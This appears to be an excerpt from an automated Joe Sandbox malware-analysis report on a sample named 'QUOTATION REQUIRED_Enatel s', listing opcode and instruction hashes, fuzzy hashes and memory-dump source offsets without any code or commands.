                                                                                                                                              • Instruction ID: 066402fc2d1424ba66da85c072b974fce10859294408f7a413c01dd2d6b1c3d7
                                                                                                                                              • Opcode Fuzzy Hash: 9cb69d87189672444dbe66807843f0723efd9bb109e3c42c6e78e4b31d76df30
                                                                                                                                              • Instruction Fuzzy Hash: 73210770A04318AFE701AB74AC06BAE3FB6EF86301F0484A6E545DB1C1DA344D0697A2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: a0687a2f59f3001f541de7875f6cdec322ae73b460434edb2c6a79bbf64805e0
                                                                                                                                              • Instruction ID: 96010b6151f4575b837d5978840d2bd7945326f6f620b49c22c005ac0761b75d
                                                                                                                                              • Opcode Fuzzy Hash: a0687a2f59f3001f541de7875f6cdec322ae73b460434edb2c6a79bbf64805e0
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 09d9264226965daf04af36dde2d8a3eb60a0409f4df3e4c87aa8587f1fa2a238
                                                                                                                                              • Instruction ID: 4d312cf2d10082fc23ffc8f51aa638a8283e4c5429e108e1db87452587b222bb
                                                                                                                                              • Opcode Fuzzy Hash: 09d9264226965daf04af36dde2d8a3eb60a0409f4df3e4c87aa8587f1fa2a238
                                                                                                                                              • Instruction Fuzzy Hash: 57211375D00249DFCB06CFA5D8509DEBBB2FF8A300F14806AE914AB360CB356906CF90
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 3bc67416866c5840a66474933bde30d1f9ca3d07c50d53534302790feff278a0
                                                                                                                                              • Instruction ID: 35b463c532b644543ce7ed8304533d3d1a2b9bd32ae26ff12026ccb6c82138de
                                                                                                                                              • Opcode Fuzzy Hash: 3bc67416866c5840a66474933bde30d1f9ca3d07c50d53534302790feff278a0
                                                                                                                                              • Instruction Fuzzy Hash: EA31E0B1D11308DFDB20DF9AC988B8EBBF5BB48B15F248419E404BB240C7B56845CF91
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 48cbaf6c3ddf892884a0e8f23b24d3b105f295ba7850d0e83e74b5ddd016a1e8
                                                                                                                                              • Instruction ID: 7bf9bd84714a6f0fe98798d168d6bfb2ad1c0521f56f964ed9ca73f2f9a7b0be
                                                                                                                                              • Opcode Fuzzy Hash: 48cbaf6c3ddf892884a0e8f23b24d3b105f295ba7850d0e83e74b5ddd016a1e8
                                                                                                                                              • Instruction Fuzzy Hash: 5231DDB5D11218DFDB20DFA9C988B8EBBF1BF48B14F24841AE404BB280C7B56845CF91
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1637049789.0000000008970000.00000040.00000800.00020000.00000000.sdmp, Offset: 08970000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_8970000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: ab0ad581c5c83236a7a71b3e48394c3565c9ea97f456f632e2311eef1e574b8d
                                                                                                                                              • Instruction ID: e7b31ca6efa76d14227b78b44b50454184a58b8119041c3707c341925d616795
                                                                                                                                              • Opcode Fuzzy Hash: ab0ad581c5c83236a7a71b3e48394c3565c9ea97f456f632e2311eef1e574b8d
                                                                                                                                              • Instruction Fuzzy Hash: 0521EF75D00209EFCB09CFA5E8449DEBBB6FF89310F10802AE915AB360DB756956DF90
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: d2b645475bf45c9f4ca710fd84ac6b17d611ea71b789342af2919eec3d7dde5f
                                                                                                                                              • Instruction ID: 31900dc5391aad2c19a10420b50f314b894033a2f8da2dd882eb662ab057fea2
                                                                                                                                              • Opcode Fuzzy Hash: d2b645475bf45c9f4ca710fd84ac6b17d611ea71b789342af2919eec3d7dde5f
                                                                                                                                              • Instruction Fuzzy Hash: BC216DB9700A109FDB20DF15C984F6A77F6BF88722B15846EE5468B761D731F841CB90
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1637049789.0000000008970000.00000040.00000800.00020000.00000000.sdmp, Offset: 08970000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_8970000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 2e872805d6f6ad00f58bb4fa5bc7ba6c30356e1d2c3d240f34e0e58a56ee78ac
                                                                                                                                              • Instruction ID: 762d174609a71096eba5f38e8676768b9aeb223877f55451167b9b30a981ac36
                                                                                                                                              • Opcode Fuzzy Hash: 2e872805d6f6ad00f58bb4fa5bc7ba6c30356e1d2c3d240f34e0e58a56ee78ac
                                                                                                                                              • Instruction Fuzzy Hash: 9A215E39E00206CFDB04EFA4E8546E9B775FF89304F24951AD60277389EB706955CB91
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 18d03cfa39128fed8ed516ac6c9004ad650650f3cb2868974b91dc477fb93bcb
                                                                                                                                              • Instruction ID: 871670e0b6119ca3e62d0b39d1081ccda062e579e0362db6e14ecdcc54f5fce5
                                                                                                                                              • Opcode Fuzzy Hash: 18d03cfa39128fed8ed516ac6c9004ad650650f3cb2868974b91dc477fb93bcb
                                                                                                                                              • Instruction Fuzzy Hash: 1721EF71E0020A9FCB45DFADC8449AFFBF5FF98300B10855AE514E7211E770A955CB90
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 9adcd255a97796e548cfa8690d33061c10913dee38d978106d89cad38c324df5
                                                                                                                                              • Instruction ID: 79995b3ab5d20d02cfa1e57b264e98a07801375330376cda55dac0988f4c9147
                                                                                                                                              • Opcode Fuzzy Hash: 9adcd255a97796e548cfa8690d33061c10913dee38d978106d89cad38c324df5
                                                                                                                                              • Instruction Fuzzy Hash: D3214F71E0024A9FCB01DFADC8409AFFBF9FF89200B11855AE418E7211EB70A946CB90
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1630684978.0000000000CDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CDD000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_cdd000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 24ed2deb6a89f50456438308c6199903480edb59ecc32e09b7646b4c8443609d
                                                                                                                                              • Instruction ID: 70da1fb145da6b6d1e7d8a4446f343ab8c66fe0616a27233b2fbdeb9176068aa
                                                                                                                                              • Opcode Fuzzy Hash: 24ed2deb6a89f50456438308c6199903480edb59ecc32e09b7646b4c8443609d
                                                                                                                                              • Instruction Fuzzy Hash: 7F218E755093808FCB12CF24D990715BF71EB86314F28C5EBD9498B6A7C33A980ACB62
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1637049789.0000000008970000.00000040.00000800.00020000.00000000.sdmp, Offset: 08970000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_8970000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 402b6be7ebd7056c136c21c5b75249a284a2df106fac13c531c1a85b314feeea
                                                                                                                                              • Instruction ID: 5adda64c6957e758fd15615d400e895bb614d014d974b3707d061c906258ea2a
                                                                                                                                              • Opcode Fuzzy Hash: 402b6be7ebd7056c136c21c5b75249a284a2df106fac13c531c1a85b314feeea
                                                                                                                                              • Instruction Fuzzy Hash: 1C215E39E0020ACFDB04EFA5E8546AAB775FF85304F20911AD60277389EB707955CB91
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 7fde980447cc21fbd162abadbdce9ce697974c1f8e9402e9b20cd95e23ee4964
                                                                                                                                              • Instruction ID: 433f17548cf3c6628fd5249a87ba5eb1d7bebafe62937d0c33127e6c49cfcb87
                                                                                                                                              • Opcode Fuzzy Hash: 7fde980447cc21fbd162abadbdce9ce697974c1f8e9402e9b20cd95e23ee4964
                                                                                                                                              • Instruction Fuzzy Hash: 7611E07AA103165F8B15EBB99C449BFBBFAFFC46617148929E415E3340EF30AD0487A1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 2f02a9b5fba2c58588c2dd2b8c8ba5edc49af818a6ec4d12940cf44c6a505652
                                                                                                                                              • Instruction ID: cb2c6160063429a34076ad9d2cf2295c8acc6638ceba996c6ad5fdeb5ff59810
                                                                                                                                              • Opcode Fuzzy Hash: 2f02a9b5fba2c58588c2dd2b8c8ba5edc49af818a6ec4d12940cf44c6a505652
                                                                                                                                              • Instruction Fuzzy Hash: 57110676A102055B9B11EFB99C446BFBBF7FFC4221B148529E415E3300EF30AD018760
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 35cc18c43e29aba530bdee22253c03c536539bc786a031e028915b82d9c4dfac
                                                                                                                                              • Instruction ID: 7c76d8e3aeb7506cf33c470c3b083acc892c100e8519400ed46b6c62328e20a7
                                                                                                                                              • Opcode Fuzzy Hash: 35cc18c43e29aba530bdee22253c03c536539bc786a031e028915b82d9c4dfac
                                                                                                                                              • Instruction Fuzzy Hash: 54112E32B102198BDB14EFB998106EFB7F6BBC9712B10417AC904F7244EB329D11DBA1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1630613482.0000000000CCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CCD000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_ccd000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                                                                                                              • Instruction ID: 2a0b40d27812605ca7ba8455b4cb4fa6f92b3aae2276eee61cd1b97019105487
                                                                                                                                              • Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                                                                                                              • Instruction Fuzzy Hash: 39110376504240DFCB05CF00D9C0B16BF72FB94324F24C2ADD90A0B256C33AE956CBA1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 3db4720da179adb56835ebbbd625f05f524a79706938ca35ae52e43a65ea6ce5
                                                                                                                                              • Instruction ID: 9b58b07dd6ac42b640365c6a9f7c6e543dbf00190a0637acb40dcd9f28e34b86
                                                                                                                                              • Opcode Fuzzy Hash: 3db4720da179adb56835ebbbd625f05f524a79706938ca35ae52e43a65ea6ce5
                                                                                                                                              • Instruction Fuzzy Hash: 1F018B72A042144BD748FB79A85436E7EEAEFC8600F14847ED149C7344EE34894683A1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 10e58ef27d9902defb0bc21be695e739d54b30388884a5ea8dccee6534687927
                                                                                                                                              • Instruction ID: 25911d9620bbf19351075b21a6bf8fd4f9b5cf34fecd17e91514b0955515df58
                                                                                                                                              • Opcode Fuzzy Hash: 10e58ef27d9902defb0bc21be695e739d54b30388884a5ea8dccee6534687927
                                                                                                                                              • Instruction Fuzzy Hash: D11199B5E001199F8B44DFADD9849AEBBF1FF89210B10856AE918E7315E730D911CFA0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1630684978.0000000000CDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CDD000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_cdd000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                                                                                                              • Instruction ID: 00dab7302c501ef7946a848be0dc2b39d0e7d11949ce43b296e6335a1d8c2c45
                                                                                                                                              • Opcode Fuzzy Hash: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                                                                                                              • Instruction Fuzzy Hash: A911A975904280DFCB01DF10C5C0B15FBA2FB84324F24C6AAD94A4B796C33AD84ACB61
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 8b6903345bd41aa584dd5b15694738ca35d144ec9d4632eaf8f8061d49bf2816
                                                                                                                                              • Instruction ID: 5e4f3b0e3cb2384606b311af143b8fc7a2d14548a4ceae0596efc65f5d12e41b
                                                                                                                                              • Opcode Fuzzy Hash: 8b6903345bd41aa584dd5b15694738ca35d144ec9d4632eaf8f8061d49bf2816
                                                                                                                                              • Instruction Fuzzy Hash: 4A1189B5E0011A9F8B44DFADD9449AEBBF5FF88310B10816AE919E7315E7309911CFA0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1637049789.0000000008970000.00000040.00000800.00020000.00000000.sdmp, Offset: 08970000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_8970000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 9f0988959e72432f380d89056664cdd67c99eccc5733376d30773ce5c057c836
                                                                                                                                              • Instruction ID: 636d2be61aba32b81752d042f7c13872e0068abad3166ec605c8bed71b1ce671
                                                                                                                                              • Opcode Fuzzy Hash: 9f0988959e72432f380d89056664cdd67c99eccc5733376d30773ce5c057c836
                                                                                                                                              • Instruction Fuzzy Hash: BC1107B1C062489FCB02CFA8C45469EBFB1AF0A300F1584AAD404EB262D7358A44DB91
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: a231cd2db2359c786ecf77df4261ecccf6bb8337d7e88fdfc968af3cbaf12f71
                                                                                                                                              • Instruction ID: 079853cb9352dd40873935a55cb34c0abebf5e48be06911ef292b3385dfb256a
                                                                                                                                              • Opcode Fuzzy Hash: a231cd2db2359c786ecf77df4261ecccf6bb8337d7e88fdfc968af3cbaf12f71
                                                                                                                                              • Instruction Fuzzy Hash: A811F3B5C007498FDB10DF9AD844A9EFBF4EB88320F10841AD819A7310D378A905CFA1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 5496ee2fb8f1678499da87a8e047ffa2dcd9fd54f9b1c25afc5d1e624256d549
                                                                                                                                              • Instruction ID: 4fb71bbcfbdb108d6ab4ea414c03025ea6d5152082af7056ba78479e8b64b1f9
                                                                                                                                              • Opcode Fuzzy Hash: 5496ee2fb8f1678499da87a8e047ffa2dcd9fd54f9b1c25afc5d1e624256d549
                                                                                                                                              • Instruction Fuzzy Hash: 7511F3B5D007498FDB10DF9AD848B9EFBF4EB88320F10841AD859A7310D374AA45CFA1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 04855b13c20adff6e84a5d156aea24dfb2e19830e68f331a46d5054df1f16f1d
                                                                                                                                              • Instruction ID: 03e93670406a575a4ac2c26f170ba08353892643c02a2a0acfa9ced4084dd3ee
                                                                                                                                              • Opcode Fuzzy Hash: 04855b13c20adff6e84a5d156aea24dfb2e19830e68f331a46d5054df1f16f1d
                                                                                                                                              • Instruction Fuzzy Hash: CD11F3B5D047498FDB10DF9AD848B9EFBF4EB88320F10841AD859A7310D374AA45CFA1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 5b4dae4998f7e33385814fa14350ab85e7a10932562196121819ba755caf6670
                                                                                                                                              • Instruction ID: 0dc982f938e18cab0928b9b571f58a300c64e8b3a1d02ae53d954b19fb55b45c
                                                                                                                                              • Opcode Fuzzy Hash: 5b4dae4998f7e33385814fa14350ab85e7a10932562196121819ba755caf6670
                                                                                                                                              • Instruction Fuzzy Hash: 361133B5900348CFDB20DF9AC584B9EFBF4EB48320F10845AD959A7300D379A944CFA5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 0fc54ed5b7c8254b46926eca9d6e7bc69b6190e1eb00d0dbc248646a4f690f69
                                                                                                                                              • Instruction ID: 3efcf62b885ffe68edf491f9efd0f2f8a896235c54334db1b1d104a99319ae85
                                                                                                                                              • Opcode Fuzzy Hash: 0fc54ed5b7c8254b46926eca9d6e7bc69b6190e1eb00d0dbc248646a4f690f69
                                                                                                                                              • Instruction Fuzzy Hash: BD1103B5900749CFDB20DF9AC584B9EFBF4EB48320F10845AD959A7340D378A944CFA5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: c5c026f6a1eb596ff196a864c1eae6419c2c5b7ffeb8948bf4cb141a56b84bc8
                                                                                                                                              • Instruction ID: 5c52f342611453e0bd16d280210a0e947dab92fb7bb3b1edb2a479277ddf9fc2
                                                                                                                                              • Opcode Fuzzy Hash: c5c026f6a1eb596ff196a864c1eae6419c2c5b7ffeb8948bf4cb141a56b84bc8
                                                                                                                                              • Instruction Fuzzy Hash: F8F0C2363406104FABA5A778A9543BE37C6EFC4652B080065EA8AC7790FF61EC41C792
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: af262be6295627d9140366ef18d8c6ffdff59471a80cac31fbf104062e78db73
                                                                                                                                              • Instruction ID: a8fea2a5887a96b1eb9f5be94ab8f9d721845a079dd0e318c6ff673e264b2961
                                                                                                                                              • Opcode Fuzzy Hash: af262be6295627d9140366ef18d8c6ffdff59471a80cac31fbf104062e78db73
                                                                                                                                              • Instruction Fuzzy Hash: 900169B8A04289EFDB05EBB8F49468C7FB1FB95300F1081AEC4419B296EB340E05DB55
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
Memory Dump Source
• Source File: 00000000.00000002.1637049789.0000000008970000.00000040.00000800.00020000.00000000.sdmp, Offset: 08970000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8970000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: a2049c0a8f117cb66592591fc75ba2d3b130e90c68a603ed4c39f6bd551dd3d0
                                                                                                                                              • Instruction ID: 737fa68de9e479e9873e6e00be0527d0c9cedcc46f1c907fcd809b20d9915457
                                                                                                                                              • Opcode Fuzzy Hash: a2049c0a8f117cb66592591fc75ba2d3b130e90c68a603ed4c39f6bd551dd3d0
                                                                                                                                              • Instruction Fuzzy Hash: CB01D0B5C01209EFCB45DFA8C445BAEBBF1FF49301F1084AAE518A7260E7358A40DF91
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: d0bc01d755d99b0f8494366096c84b0586f1f9055b1540504ba626cd315f3469
                                                                                                                                              • Instruction ID: 89ea6e8c5344768d26845860b5528030f81eea57048d38b9255afadbe6749798
                                                                                                                                              • Opcode Fuzzy Hash: d0bc01d755d99b0f8494366096c84b0586f1f9055b1540504ba626cd315f3469
                                                                                                                                              • Instruction Fuzzy Hash: 7AF09671B001565BAF05ABA858509FEBBAADBC9515F040069E505A7340EF305911C7F5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_4d30000_QUOTATION REQUIRED_Enatel s.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: fb36d6a5c49c0929c7b782b3d2f248b6df8d171964b49dbb1b6dc6015aa3a52d
                                                                                                                                              • Instruction ID: 319c8a8cdc4dab9e90f877d2a2eea7cec900c3d686a03df9abb63f7eb03b8efe
                                                                                                                                              • Opcode Fuzzy Hash: fb36d6a5c49c0929c7b782b3d2f248b6df8d171964b49dbb1b6dc6015aa3a52d
                                                                                                                                              • Instruction Fuzzy Hash: CBF0F092B0E3C05FEB1367645C605A97F70DB97212F0800DBC181DB1A3E148551AC332
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.1635560054.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
